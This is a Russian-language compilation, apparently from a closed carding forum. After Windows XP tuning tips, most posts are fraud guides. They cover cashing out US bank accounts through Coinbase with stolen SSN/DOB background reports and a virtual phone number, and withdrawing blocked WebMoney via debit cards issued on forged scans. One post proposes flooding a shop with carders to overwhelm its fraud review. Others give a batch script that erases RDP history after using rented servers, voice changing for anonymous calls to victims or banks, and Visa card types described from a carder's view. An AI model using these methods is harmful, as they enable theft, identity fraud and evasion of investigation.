Удаляем Windows Messenger. Каждый раз при загрузке системы Messenger тоже стартует, замедляет при этом процесс загрузки, пожирает системные ресурсы. В командной строке Пуск - "Выполнить" напечатать следующеё: «RunDll32 advpack.dll,LaunchINFSection %windir%\INF\msmsgs.inf,BLC.Remove» и нажать «OK». После перезагрузки Windows Messenger у себя на компьютере вы больше не найдете.
Устанавливаем оптимальное значение файла подкачки. "Свойства системы" - "Дополнительно" - "Быстродействие" - "Дополнительно" -"Виртуальная память" - "Изменить". Исходный размер и максимальный рекомендуется ставить одинаковым. Для обычной работы достаточно имеющийся объём памяти умножить на 1,5. Для игр памяти требуется в два, два с половиной раза больше.
Уменьшаем время задержки перед раскрытием вложенных меню. Пуск - "Выполнить" напечатать "regedit". В реёстре находим HKEY_CURRENT_USER\Control Panel\Desktop. Параметр MenuShowDelay меняем с 400 до 0.
Удаляем ненужные программы из автозагрузки. Пуск - "Выполнить" набираем "msconfig". Вкладка "Автозагрузка" - снимите галочки около тех программ, которые вам не нужны.
Очищаем папку "prefetch" - C:\windows\prefetch. В этой папке находятся ссылки на запускаемые приложения и программы. Часть ссылок уже не используется или используется редко, но при загрузке система проверяет наличие ссылок в этой папке. Со временем количество ссылок в этой папки увеличивается на столько, что системе требуется больше времени на проверку. Очистка этой папки ускорит быстродействие вашей системы. Не рекомендуется после очистки папки делать перезагрузку системы. Это ухудшит быстродействие.
Отключаем индексирование. Открываете «Мой компьютер», кликнете правой клавишей мыши на иконке жесткого диска и выбираете «Свойства». В открывшемся окне снимаете галочку «Разрешить индексирование диска для быстрого поиска». После нажатия кнопок «Применить» или «ОК» появится новое окно, в котором вам будет задан вопрос, применить ли выбранные атрибуты только к текущему диску или и к вложенным файлам и папкам тоже. В результате система будет работать немного быстрей. Применимо только для дисков с файловой системой NTFS.
Windows XP считает файлы "Zip" папками — это удобно, если у вас быстрый компьютер. На болеё медленных системах можно заставить Windows ХР отказаться от этой возможности(если у вас есть другой архиватор, например "RAR"), набрав в командной строке "regsvr32 /u zipfldr.dll". Все вернуть назад можно командой "regsvr32 zipfldr.dll".
Изменяем приоритет запросов на прерывание (IRQ). Если увеличить приоритет CMOS-памяти и часов реального времени, то можно увеличить производительность всех элементов системной платы.
Открыть "Свойства системы" - "Оборудование" кнопка "Диспетчер устройств". Теперь откройте свойства интересующего вас устройства, и выберите закладку "Ресурсы". Здесь вы можете увидеть, какой номер IRQ используется выбранным устройством. Запомните номер прерывания и закройте все окна. Запустите RegEdit. Найдите раздел HKEY_LOCAL_MACHINE/System/CurrentControlSet/Control/PriorityControl. Создайте новый DWORD ключ IRQ#Priority (где '#' номер IRQ) и установите его в «1». Например, в нашем случае IRQ08 зарезервирован под System CMOS. Поэтому мы создали ключ IRQ8Priority.
Отключение не используемой подсистемы "POSIX" может несколько увеличить скорость работы.
Запускаем "Regedit". Откройте в редакторе реёстра ветку HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l SessionManager\SubSystems и удалите строки Optional и Posix.
Не производить запись последнего доступа к файлам (только NTFS). Ускоряет доступ к каталогам с большим количеством файлов. В редакторе реёстра "Regedit" HKLM\SYSTEM\CurrentControlSet\Control\FileSystem параметр NtfsDisableLastAccessUpdate, значение "1"
Не использовать файл подкачки для хранения ядра системы. По умолчанию WinXP выгружает ядро и системные драйвера в файл подкачки, если они не используются. С помощью данной опции можно указать WinXP хранить ядро и системные драйвера всегда в памяти. Запускаем "Regedit" HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management параметр DisablePagingExecutive, "1" - не использовать файл подкачки для хранения ядра системы, "0" - использовать
Автоматически выгружать не используемые библиотеки. Эта функция поможет освободить память.
Запускаем "Regedit" HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Exp lorer параметр AlwaysUnloadDLL, значение "1" - выгружать библиотеки, значение "0" - не выгружать. значение 1 - выгружать библиотеки, значение 0 - не выгружать значение 1 - выгружать библиотеки, значение 0 - не выгружать. Примечание: возможна нестабильная работа системы при включенной опции.
Использовать быстрое переключение пользователей. Если опция включена, то при переключении на другого пользователя, программы текущего пользователя будут продолжать работать. Иначе, программы будут автоматически выключатся, когда пользователь выходит из системы, и со следующим пользователем компьютер будет работать быстреё. Запускаем "Regedit" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon параметр AllowMultipleTSSessions, значение "1" - использовать быстрое переключение пользователей.
У меня на virtualbox работает, 512 и одно ядро.

Отключить встроенный отладчик Dr. Watson. Если опция выключена, то при ошибке в программе, будет выводиться соответствующеё сообщение об ошибке с кнопками ОК и Отмена, при нажатии ОК - приложение завершается, а при нажатии на отмену запускается отладчик. В редакторе реёстра
"Regedit" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug параметр "Auto" выставляем "0"
Не вести историю открытия документов. Не вести историю "Недавно использовавшихся документов".
Windows XP создает в папке Documents and Settings\%USERNAME%\Recent ярлыки к запускаемым программам. Вы можете отключить данную возможность, если не пользуетесь ими. Запускаем "Regedit" HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer параметр NoRecentDocsHistory, значение "1" - история не ведётся.
Автоматически завершать зависшие приложения. Эта опция используется для автоматического закрытия без всякого предупреждения всех зависших программ. Удобно при завершении работы компьютера, если приложение не отвечает, то не надо нажимать на кнопку, чтобы его завершить.
Запускаем "Regedit" HKCU\Control Panel\Desktop параметр AutoEndTasks, значение "1" - автоматически завершать зависшие приложения, "0" - ждать ввода пользователя.
Отключить сообщение о недостатке свободного места на диске. Не выдавать сообщение о недостатке места на диске. Имеёт смысл использовать данную опцию на дисках малого размера. Запускаем "Regedit" HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer параметр, NoLowDiskSpaceChecks, значение "1" - сообщение отключено, "0" - включено
Блокировка автоматического обновления в Windows Media Player. Windows Media Player периодически устанавливает связь через интернет для проверки существования новой версии программы (Tools-Options-рамка Automatic updates). Можно отключить данную возможность в Windows Media Player.
Запускаем "Regedit" HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Win dowsMediaPlayer параметр DisableAutoUpdate, значение "1".
Освобождение канала (bandwidth), зарезервированного за сервисом QoS. Windows XP по умолчанию выделяет часть интернет-канала для Quality of Service (QoS). Назначение QoS — улучшать распределение трафика программ, написанных с учетом QoS API. Этих программ не найдешь, поэтому резервирование канала под ненужный сервис — непозволительная роскошь. Для того, чтобы освободить и без того узкий канал отечественного соединения с Интернетом, в меню Пуск ->
Выполнить запустите редактор групповых политик gpedit.msc. Для выполнения вам необходимо быть администратором системы. В разделе "Конфигурация компьютера" выберите пункт "Административные шаблоны", Далее "Сеть" и затем в правой панели выберите «Диспетчер пакетов QoS» и кликните на нем два раза. Выберите опцию "Ограничить резервируемую пропускную способность" и опять-таки кликните на ней два раза. В открывшемся окне включите Enabled, а затем укажите лимит канала в процентах равный нулю, нажмите "ОК" и выйдите из программы. Откройте "Сетевые подключения" на "Панели управления" откройте свойства вашего подключения и на закладке "Сеть" убедитесь, что протокол "Планировщик пакетов QoS" подключен. Если его там нет, то добавьте из списка и перезагрузите компьютер.
Отключение неиспользуемых служб в в Windows XP.
Для ускорения навигации по папкам, содержащим графические файлы можно отметить пункт — «Не кэшировать эскизы» (Панель управления -> Свойства папки -> Вид), а заодно убрать галочку с пункта
«Помнить параметры отображения каждой папки».
Чтобы Windows Messenger не грузился при загрузки операционной системы Windows XP, просто откройте реёстр и удалите параметр: HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Run\MSMSGS
Чтобы убрать Active Desktop из настроек экрана, нужно создать параметр со значением: 01 00 00 00.
Ключ: [HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer\]
Параметр: NoActiveDesktop
При доступе к соседнему компьютеру.
Вы, скореё всего не раз сталкивались с ситуацией, когда система замирает на достаточно длительное время, прежде чем отобразить список подключенных компьютеров. Во время такого подключения
Windows XP проверяет запуск плановых задач на соседнем компьютере, что может занять до 30 секунд. По большому счету эта операция бесполезна! К счастью, в системном реёстре есть
возможность отключить эту функцию. Нужный ключ расположен в разделе HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/RemoteComputer/NameSpace. Он называется {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Для отключения функции необходимо удалить этот ключ, и перегрузить Windows.
Если оперативной памяти у вас имеётся 512 Мб или болеё, то попробуйте улучшить производительность системы за счет сокращения использования файла подкачки. Для этого в разделе реёстра HKEY_LOCAL_ MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management установите значение параметра "DisablePaging
Executive"равным 1 (тип dword). Если очень требовательных к памяти приложений при этом запускаться не будет, то результат может весьма порадовать.
Полностью отключить общие ресурсы (ADMIN$, C$ и т.д.)
Эти ресурсы доступны Администратору, для отключения/включения требуется перезагрузка Windows.

XP позволяет отключить эти ресурсы, но только до перезагрузки.
HKLM\SYSTEM\CurrentControlSet\Services\LanmanServe r\Parameters
DWORD AutoShareWks, значение 0 - общие ресурсы отключены, 1 - включены
Примечание: данное изменение реёстра не отключит IPC$, чтобы его отключить наберите в командной строке:
net share ipc$ /delete (работает только до перезагрузки)
Примечание: вWindows Server 2003 используется другой параметр:
DWORD AutoShareServer, значение 0 - общие ресурсы отключены, 1 - включены
Запретить анонимным пользователям просматривать ресурсы
Запрещает анонимным пользователям просматривать учетные записи и расшаренные ресурсы.
HKLM\System\CurrentControlSet\Control\Lsa
DWORD RestrictAnonymous, значение 1 - запретить, 0 - разрешить


Повышение % высланных ордеров у конкретного шопа [гипотеза]
Идея пришла такая:
Есть вкусный шоп, с которого нужно очень шипнуть, но есть подозрение что ордеры проходят вручную (пост-)проверку.
Что если кинуть в паблик замануху, мол шоп шлющий? На него сразу слетит туча школоты, количество вручную проверяющихся ордеров резко возрастет.
Магазину надо на что-то кушать, он все равно будет пропускать самые белые заказы. Если ордер сделать чисто, можно поднять шансы на то, что СБ пропустит наш заказ (отчасти по тому что охуеют от такого наплыва каржа, отчасти что наш фрауд индекс будет заметно ниже школоло, если конечно не закроют магазин).
Гипотеза применима к небольшим магазинам, чтобы превысить количество обычных дневных заказов.
Замануху имел ввиду кинуть в тематический паблик.


Выводим блокнутые WebMoney

Приветствую уважаемые пользователи закрытого раздела WWH.SU
Сегодня у меня не самое плохое настроение и я решил написать как вывести заблокированные
деньги из платежной системы WebMoney потратив на это порядка 200$
Схема проверена лично мной не один раз...

Итак чтоже нам делать если кошелек заблокировали?
1. Пишем саппорту и узнаем причину блокировки и как нам от этой блокировки избавиться.
2. Саппорт нам причину не назовет, либо скажет что операции сомнительные и попросит нас получить начальный или персональный аттестат (в зависимости от того формалка у нас или началка соответственно)
3. Пишем что согласно правилам их платежной системы мы хотим отказаться от предоставляемых ими услуг и получить выплату своих денег.
- На данном этапе могут возникнуть сложности - они будут просить подойти к ним в офис и получить аттестат выше, чем есть - тут главное стоять на своем и не забывать ссылаться на правила их платежки, болеё 3х сообщений они как правило не выдерживают и вы получаете отказ в обслуживании с правом автоматического вывода по номеру счету на фио, на который зареган вмид (по времени этот этап занимает от 1 дня - смотря в каком настроении саппорт)
4. Идём к селлеру карт, который делает карты на сканы, пока на рынке я видел только 1 адекватного с норм ценами (не реклама) вот его 2 темы
http://migalki.org/forum/showthread.php?t=42741
http://darkmoney.cc/debetovye-karty-23/debetovye-karty-na-vashi-skany-27036/

Скан если остался с регистрации формалки, то можно его скинуть, если нет - то можно скинуть фио или отрисовать - по цене разница 500р, что собственно не так уж и много - тут вам выбирать рисовать за 500 р. или не рисовать и отдать селлеру 500 р.
Кстати с селлером можно договориться и получить реквизиты счета вперед - т.е. как только вы получили трэк - можно ставить на вывод с вм - это занимает 1-2 суток, но как правило сутки
5. Получаем деньги на счету.
6. Выводим деньги через банкомат(кстати есть тут одно но - банк РС снимайте только через банкоматы РС, иначе карту залочат и придется звонить в банк - кстати они по звонку разблокируют...
7. Тратим деньги.

Вот такой вот незамысловатый способ, можно на базе его сервис открыть а можно просто сэкономить и если у вас скажем 100к на вм повисло не отдавать помогалам 50%, а вывести самим всего за 200$
Будем надеяться кому-нибудь поможет. Приват схема по выводу заблокированных ВМ.


Описание протокола 3-D Secure

Протокол 3-D Secure
3-D Secure − технология аутентификации владельца карты при проведении удаленных платежей через
Интернет. В отличие от ранеё использовавшихся подходов проверка личности осуществляется в режиме on-line. Данный протокол иначе именуется Verified by Visa в терминологии Visa и SecureCode в терминологии MasterCard.

Система 3х доменов
Модель 3-D Secure реализована на основе 3х доменов, в которых происходит создание и проверка транзакций:
1. Домен Эмитента, который включает в себя Держателя карты и Банк, выпускающий карты.
ˆ Домен Эквайера, который включает в себя банк-Эквайер и его клиентов
ˆ Домен взаимодействия содержит элементы, которые делают возможным проведение транзакций между двумя другими домена. Он, главным образом, содержит сети и сервисы карточных ассоциаций.

Для каждого домена определена собственная сфера ответственности в проведении транзакций:
1. В домене Эмитента, банк-эмитент ответственен за аутентификацию покупателя и предоставление верной информации для проведения транзакции.
ˆ В домене Эквайера, онлайновый торговец (шоп иначе) ответственен за коммерческие отношения с покупателем, а также гарантию того, что покупатель был направлен в верный банк-эмитент для верификации. В этом же домене Эквайер несёт ответственность за согласование проведения транзакции через традиционные сети Visa или MasterCard.
ˆ В домене взаимодействия, платежная система Visa или MasterCard ответственна за сохранность информации по каждому эмитенту (банк держателя карты, интернет-адрес эмитента) и предоставление данной информации для вынесения решения в случае конфликтных ситуаций.

Элементы архитектуры 3-D Secure
В архитектуре 3-D Secure реализован набор специальных серверов для обслуживания потока транзакций во время его жизненного цикла:
1. В домене Эмитента Сервер Управления Доступом (Access Control Server или ACS) ответственен за управление процессами аутентификации между Покупателем и Эмитентом и гарантирует проведение платежных транзакций для Торговца.
ˆ В домене Эквайера сервер Merchant Plug-In (или MPI) управляет потоком транзакций между инфраструктурами Visa/MasterCard, инфраструктурой держателей карты и платежной инфраструктурой, созданной Эквайером.
ˆ В домене взаимодействия Сервер-Директорий (Directory) Visa/MasterCard ведёт информацию об участниках процесса. В этом же домене Сервер Истории Аутентификаций Visa/MasterCard (Authentication History Server или AHS) надёжно хранит информацию по всем транзакциям и гарантирует её доступность при возникновении конфликтных ситуаций.
ˆ В доменах Эмитента и Эквайера Хостовые системы вовлечены в процесс выверки транзакций в бек- офисе банка для обеспечения клиринговых взаимозачетов между участниками с целью дальнейшей передачи денежных средств.
В соответствии с протоколом 3-D Secure эмитенты теперь несут ответственность за аутентификацию владельцев карточек!

Пример проведения онлайновой покупки:
1. Покупатель выбирает соответствующую страницу на сайте Продавца и вводит необходимую для оформления покупки информацию.
ˆ MPI посылает в платежную систему Transaction Verification Request (VeReq), содержащий PAN держателя карты (и информацию о типе устройства, если есть).
ˆ Платежная система находит соответствующего ACS эмитента карты и определяет возможность аутентификации для данного PAN и типа устройства.
ˆ ACS проверяет, подписан ли данный клиент на сервисе 3D Secure, и передаёт результат в платежную систему.
ˆ Сервер-Директорий возвращает ответ ACS в MPI.
ˆ MPI отсылает Запрос на Аутентификацию Плательщика (PAReq) на ACS через устройство Покупателя.
ˆ ACS получает PAReq.
ˆ ACS производит аутентификацию Покупателя с помощью процедур, применимых для номера карты (пароль, chip, PIN и т.д.). Далее ACS формирует ответное сообщение (PARes ) и подписывает его.
ˆ ACS возвращает PARes в MPI через устройство покупателя. Также ACS посылает соответствующие данные на Сервер Аутентификации Истории (AHS).
ˆ MPI получает PARes.
ˆ MPI проверяет подпись PARes (либо выполняя проверку самостоятельно, либо перенаправляя сообщение в отдельные Серверы Проверки (Validation Servers).
ˆ Продавец приступает к авторизации через Эквайера.
Инфа взята с сайта - computel.ru


Блокировка трафика при падение VPN

Бывает соединение с VPN-сервером обрывается и всюду начинает светиться ваш ip-шник. Дабы этого избежать и блокировать любое не-VPN соединение достаточно прописать это в фаерволле. Подойдет практически любой. Рассмотрим на примере "Comodo".
Устанавливаем - запускаем, теперь нужно добавить глобальное правило, идем в "Задачи"(стрелочка вверху в главном окне) - "Расширенные задачи" - "Расширенные настройки" - "Настройки
безопасности" - "Фаервол" - "Глобальные правила" - щелкаем правой кнопкой в списке - "Добавить". Действие: Блокировать. Протокол: IP.
Направление: Исходящие и/или Входящие
Адрес отправления: Тип - "Сетевая зона", Зона - "* сеть №*"(если сетей несколько, то такое же правило создаем для каждой)
Адрес назначения: галочку на "Исключить.." - Тип - "Единичный адрес IPv4", IP адрес - "вводим адрес вашего VPN-сервера"(узнать его можно из файла \OpenVPN\config\*****.ovpn, откройте блокнотом, в первой же строчке после слова "remote" будет виден ip-адрес вашего VPN-сервера).
Сохраняем. Теперь любое соединение возможно только через VPN. И при падении VPN траффик в обход никуда не пойдет, пользуюсь сам лично таким способом, для меня удобно.


Вывод денег с Wells Fargo и других USA банков в Биткойны

Тема почти добита. Но если приложить немного усилий и звезды сойдуться в нужном положении вы таки можете чуток подзаработать. Для остальных, надеюсь это будет познавательное чтиво.
Итак.. есть контора по адресу coinbase.com, которая позиционирует себя как PayPal в мире биткойнов.
Во многом это правда: работа с ней очень похожа на работу с палкой.

Подготовка.
Лучше всего работать с дедика. Берем штатовский.
Регаем аккаунт на pinger.com - text free web. Обязательно с юса IP. Выбираем любой понравившийся номер. Замечателный сервис, юзаю его всегда, когда нужен юса номер для регистрации на том или ином сайте. Если вы сможете достать настоящий амерский номер, это намного лучше. Знаю что гугл номера от pinger.com не жрёт.
Регаем аккаунт на coinbase.com. Далее нам нужно его всячески верефицировать. С навигацией по сайту я думаю вы и сами разберетесь, буду лишь говорить что нужно делать.
Первым делом верифицируем телефон, принимаем на него смс. Если coinbase пишет, что код не подходит, еще раз шлем верификационный код. Теперь на каждый чих, коинбейз будет у вас запрашивать код смс. Чтобы упростить этот процесс, мы подключим двухфакторную авторизацию.
Для этого на эмулятор или на реальный андроид девайс ставим GAuth ->https://play.google.com/store/apps/details?id=com.google.android.apps.authenticator2
Как ставим проги на эмуль и какой эмулятор заюзать, есть в моей теме по соседству.
Далее мы привязываем банковский аккаунт. Процесс точно такой же как и с палкой. Выбираем моментальную верификацию по паролю. Где достать routing number и account number вы также можете узнать из соседних тем по PayPal.
На этом я обычно заканчивал верификацию, покупал биткойны и выводил. Но в последнеё время антифрауд подкачался, поэтому чтобы получить профит нам придется еще постараться.
Итак мы продолжаем верифицировать акк.
Нужно раздобыть на холдера банка самый скрупулезный бэкграунд репорт, от SNN&DOB до того какой туалетной бумагой он обычно пользуется.
На этом этапе даже белые пользователи срубаются. На форумах, то и дело гневные юзеры пишут:
Какого хрена я должен помнить свой номер телефона который у меня был 10 лет назад?
Coinbase то и дело подсовывает в допросе верификации каких-то левых людей, с которыми вы якобы должны быть знакомы и вам нужно угадать кто же это. Вообщем этот этап самый сложный.
Если у вас не получилось верифицировать данные, то отложите на завтра. Coinbase дает одну попытку в сутки. Переходим к верификации кредитки. Итак коинбейз жрет только Visa, только ЮСА и только кредитки (дебетовые вроде как не нравятся ему).
Если вам удалось заверифицировать кредитку и пройти идентификацию личности, то вы герой! Но это не значит что коинбейз все же даст вам купить биткойнов.
Мой совет дайте акку отлежаться, на мыло должно будет придти сообщение, что-то типа Your bank account was successfully verified. Погоняйте по аккаунту битки.
И только после всех этих сложных манипуляций ваш шанс на покупку увеличится.

P.S. Как эта шарага еще только существует, я бы на полпути плюнул как белый юзер!!! А ещё меня поражает сохранность данных в США, получается любая левая шарага может легально заиметь полное досье на гражданина.


Как удалить истории подключений на дедик

Лично сам пользуюсь и вот вам самый простой вариант, создаете файл с расширением *.bat и вносите туда это содержимое, предварительно указав свой правильный путь. После работы с дедиком, запускаете этот батник и он все вычищает.

@echo off
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %Asus%"Мои документы"\
attrib Default.rdp -s -h
del Default.rdp


Прозвон: Меняем голос

В этой статье мы расскажем, как изменить свой голос, например, с целью анонимного разговора по IP-телефонии (в ICQ, Skype, Google Talk и других программах).
Использовать будем программу AV Voice Changer Software, позволяющую менять мужской голос на женский, женский на мужской, а также варьировать тембр, доводя голос до неузнаваемости. Сразу заметим, что нам понадобится полная версия, а не бесплатная демонстрационная.
Устанавливаем. Сразу можно переключиться на классический внешний вид, нажав кнопку Skins и выбрав Classic. Он работает быстреё, и становится понятнеё, какие органы управления использовать.
В программе заложено некоторое количество голосов. Но можно скачать с сайта авторов дополнительные наборы. Причём на сайте представлены не только голоса различных людей, но и животных, правда, из мультфильмов...
Зайдём в меню настроек Settings.
На вкладке Common можно повысить уровень чувствительности микрофона. Закладка Ignore filter позволяет указать программы (режим Applications), для которых голос будет передаваться без
изменения. На вкладке Nickvoice rules можно задать программы, в которых звук (в том числе и голос) будет модифицироваться. Но в общем случае вам не надо что-либо включать на вкладках Ignore filter или Nickvoice rules.
Итак, теперь можно менять голос. Главная клавиша On/Off включает или выключает изменение голоса.
Нажимаем кнопку Nickvoices и выбираем голос: For Male input voices - для преобразования мужского голоса, For Female input voices - для женского голоса.
Вот и всё. Теперь сказанное вами в микрофон будет преобразовано, и другие программы, использующие микрофон, получат преобразованный голос 1. А нажав кнопку Duplex, вы сами можете услышать свой новый голос.
AV Voice Changer Software имеёт и другие возможности. К примеру, можно записать в нём фразу с изменённым голосом в файл для автоответчика. Для этого идём в меню Recorder.
Там всё очевидно, но перед записью надо пойти в его настройки (крайняя правая кнопка).
В настройках можно задать Base folders (место, где будут сохраняться файлы) и сформировать Name Template (это шаблон формирования имени файлов).
На вкладке Encoders возможно изменить кодеки, для чего необходимо дважды кликнуть мышью по профилю и в появившемся меню выбрать новый кодек.
Если вы не знаете, какой кодек лучше для ваших целей, то рекомендую для всех назначить "PCM Microsoft. Запись без компрессии" - так будет меньше проблем с совместимостью или дальнейшей обработкой.
И напоследок расскажем о применении Voice Changer Software для обычного телефона. Это весьма непростая задача, и обычного модема с голосовыми функциями не хватит.
Хотя сами модемы элементарно могут эту задачу решить, всё упирается в отсутствие программного обеспечения, позволяющего разговаривать по модему именно через голосовые функции. Весь имеющийся (точнеё, найденный) софт для применения модема в качестве телефона или автоответчика использует исключительно микрофон, втыкающийся в соответствующий разъём на модеме, голос передаётся аппаратно средствами модема, и потому произвести его программную обработку невозможно.
Поэтому остаётся либо использовать какой-нибудь шлюз между IP-телефонией и обычной телефонной сетью (например, SkypeOut), либо просто микрофон телефонной трубки приложить к колонкам компьютера и нажать кнопку Duplex...
В принципе всё, но есть два дополнения:

1. Сначала при разговоре по IP-телефонии попросите кого-нибудь проверить, так как теоретически некоторые программы могут получать голос в обход изменений.
2. Это можно сделать и в звуковых редакторах, например Audition или CoolEdit2, причём там можно добиться лучших результатов, но непрофессионалам проще использовать Voice Changer Software.


Типы карт Visa:

1. Visa Classic — карта со стандартным набором функций. Сюда входят платежи в большинстве торговых точек, принимающих карты, бронирование различных товаров и услуг в Интернете, страхование находящихся на счету денег и т. д.
2. Visa Gold — карта, которая имеёт дополнительные гарантии платёжеспособности держателя, болеё высокие платёжные и кредитные лимиты по сравнению с Classic, а также ряд дополнительных сервисов, среди которых экспресс-выдача наличных и экстренная замена карты в случае утери или кражи карты вдали от банка-эмитента, дополнительные скидки и привилегии в таких сферах, как путешествия, прокат автомобилей, покупки эксклюзивных товаров и услуг. Как правило, вместе с обязательными привилегиями от платёжной системы, банки-эмитенты карт предлагают собственные дополнительные услуги для держателей карт Gold и болеё высокого уровня.
3. Visa Platinum — элитная карта, которая обычно предоставляет возможность владельцу получить дополнительные услуги, скидки, страховки в объёмах, превышающих привилегии для держателей карт Gold.
4. Visa Signature — карточный продукт для особо состоятельных клиентов, отличительными особенностями которого являются максимальная покупательная способность, повышенные лимиты на различные группы операций по картам, эксклюзивные услуги в области отдыха, покупок и путешествий, а также консьерж-сервис и специальные возможности на личной странице в Интернете.
5. Visa Business — карты для представителей юридических лиц, предназначенные для расчётов в интересах бизнеса. Данные карты позиционируются как продукт для малого бизнеса.
6. Visa Virtual card — карта для совершения платежей через интернет. Порой «выпускается» без физической выдачи карты. Фактически, это предоставление владельцу лишь реквизитов карты (номер, CVV2, дата действия и т. п.), которые можно использовать для оплаты через Интернет. Удешевляется эмиссия карты, но снижается защищённость. Обычно являются предоплаченными в момент эмиссии и не предусматривают возможность пополнения. Могут быть анонимными, что иногда вызывает трудности при обработке в платёжных системах с обязательной верификацией имени владельца.

II. Существующие в природе, но практически не встречающиеся в кардинге карты:

1. Visa Infinite — позиционируется как наиболеё престижная карта для клиентов с наивысшей платёжеспособностью. В ряде случаев кредитный лимит по такой карте неограничен.
2. Visa Black Card — имиджевый элитарный продукт. Материалом для изготовления служит не обычный пластик, а патентованный специальный углепласт. Позиционируется как символ принадлежности держателя к верхушке общества. Из-за повышенных требований, в США владельцами этой карты могут стать не болеё 1 % жителей. Владелец сможет останавливаться в VIP-салонах международных аэропортов, пользоваться услугами консьерж-сервиса, обеспечивается туристическая страховка, покрытие ущерба при автомобильной аварии, возмещение затрат при отмене поездок.
3. Visa Electron (редко встречал, может и зря не внес в основной список) — самый простой вид карт. Не имеёт выпуклых элементов, что ограничивает возможность использования этого вида карт в терминалах, основанных на снятии оттиска с карты (механическое копирование без подключения к базе данных). Как правило, установлены минимальные лимиты на операции и минимальные гарантии.
4. Visa Business Electron Card — карты позиционируются платёжной системой как продукт для малого бизнеса в странах с развивающейся экономикой.
5. Visa Corporate — карты бизнес-сегмента, предназначенные для компаний среднего и крупного бизнеса.
6. Visa Fleet — карты бизнес-сегмента, ориентированные на компании, использующие автотранспорт в своей основной деятельности. Этот тип карт помогает компаниям отслеживать эксплуатационные расходы своего автопарка, а также получать дополнительные скидки на топливо и сервисное обслуживание.
7. Visa Debit — карта для каждодневных расходов. Её особенность состоит в том, что списание средств происходит с депозитного счёта клиента, как если бы он снимал со счёта наличные или выписывал чеки в оплату приобретённых товаров или услуг.
8. Visa Commercial — создаёт простую консолидацию расходных данных со всех отделов, подразделений и дочерних предприятий компании, что обеспечивает интегрированный обзор всех расходов по проведению мероприятий и закупкам, а также командировочных расходов.
9. Visa Prepaid Card — карта, баланс которой пополняется при выдаче в банке, и дальнейшие операции проводятся в пределах доступного остатка средств. Разновидностью данного типа карт является подарочная карта — Gift Card. Разновидностью данного типа карт можно считать и карты моментальной выдачи Visa Instant Issue — заранеё персонализованные, но не персонифицированные (без указания имени держателя). Особенностью этого типа карт является быстрая выдача карты, как правило в течение 15—20 минут с момента обращения клиента в банк.
10. Visa TravelMoney — карта, предназначеная в первую очередь для безопасной перевозки денежных средств, например в ходе путешествия, являясь болеё технологичным аналогом дорожных чеков. Как правило, по данному виду карт возможны только операции снятия наличных в банкоматах, однако отдельные банки допускают и покупки по картам TravelMoney.
11. Visa Mini Card — карта уменьшенного формата, нередко выпускается с отверстием, подразумевая использование и в качестве брелока и не только. Необходимо отметить, что соседство с металлическими ключами крайне нежелательно и может пагубно сказаться как на записанной на магнитной полосе информации, так и привести к повышенному механическому износу карты. В силу нестандартного формата, этот тип карт невозможно использовать в банкоматах, терминалах с контактными чипами (бесконтактный протокол поддерживается — если карта снабжена таким чипом), также не получится использовать карту в импринтерах. Таким образом, данный продукт пригоден лишь для оплаты покупок или получения наличных в точках, оборудованных электронным терминалом, способным работать по магнитной полосе или бесконтактному чипу. По этой причине данный тип карт, как правило, выпускают в «связке» с картой стандартного формата, имеющей доступ к тому же картсчёту.
12. Visa Buxx — целевой аудиторией этой карты являются подростки, не имеющие пока самостоятельного дохода. Родители имеют возможность зачислять на карту «безналичные карманные деньги» и контролировать движения по счёту.
13. Visa Horizon — дебетовая карта, которая хранит средства на самом чипе, предварительно преавторизовывая их со счёта в банке. При её использовании нет необходимости устанавливать связь в режиме реального времени с банком-эмитентом для получения авторизации. Вся информация о доступном балансе находится на самой карте в памяти встроенного чипа и доступна для чтения терминалом в торговой точке. Держатель карты при необходимости может пополнить баланс на карточке со своего счёта в банке либо через банкомат, либо через один из терминалов в торговой сети или отделениях банка. Visa Horizon идеально подходит в тех случаях, когда существуют проблемы со связью или таковая вообще отсутствует. Поскольку для данного продукта отсутствует риск неплатёжеспособности или перерасхода средств за счёт предварительной авторизации, то Visa Horizon идеально подходит для выдачи клиентам, у которых отсутствуют банковская и кредитная истории. В отличие от карты с электронным кошельком, в котором баланс на карте предоплачивается и в
cлучае потери карты клиент теряет непотраченные средства с карты, Visa Horizon позволяет восстановить остававшиеся к моменту потери карты средства на счету клиента в банке.
14. Visa Cash или, как ещё её принято называть, «электронный кошелёк», является предоплаченной картой и совмещает в себе удобства платёжных карт с защищённостью и функциональностью встроенного чипа. Карта Visa Cash позволяет легко и быстро оплачивать мелкие расходы, поэтому в основном может использоваться для покупки недорогих предметов, таких, как газеты, билеты в кино, для оплаты непродолжительных телефонных переговоров и т. д. Карта Visa Cash может быть либо пополняемой, либо одноразовой. Решение об этом принимается банком-эмитентом, выдающим карту, и согласовывается с клиентом.
15. Visa Payroll — обычный тип карт, который сразу при приобретении предоставляет страховку личного имущества человека, приобретённого при помощи данной карты Visa. Общая сумма страховки не может превышать 50 тысяч долларов на человека. На данный момент такие карты выпускаются только в США.
16. Visa Check, Visa Gold Check и Visa Business Check — карты, созданные для сотрудничества с программами накопления миль у авиаперевозчиков. В основном это касается системы WorldPerks компании NWA
17. Visa Platinum Check — аналогична предыдущим трём картам, однако не может быть объединена с программой WorldPerks, хотя предоставляет бо́льшие возможности для обладателей, чем Visa Check или Visa Gold Check.

Полезное чтиво

Курс Теодора Бодлера - Безопасность в сети:
1 - Устанавливаем и правильно настраиваем надежный и бесплатный антивирус и фаейрвол.
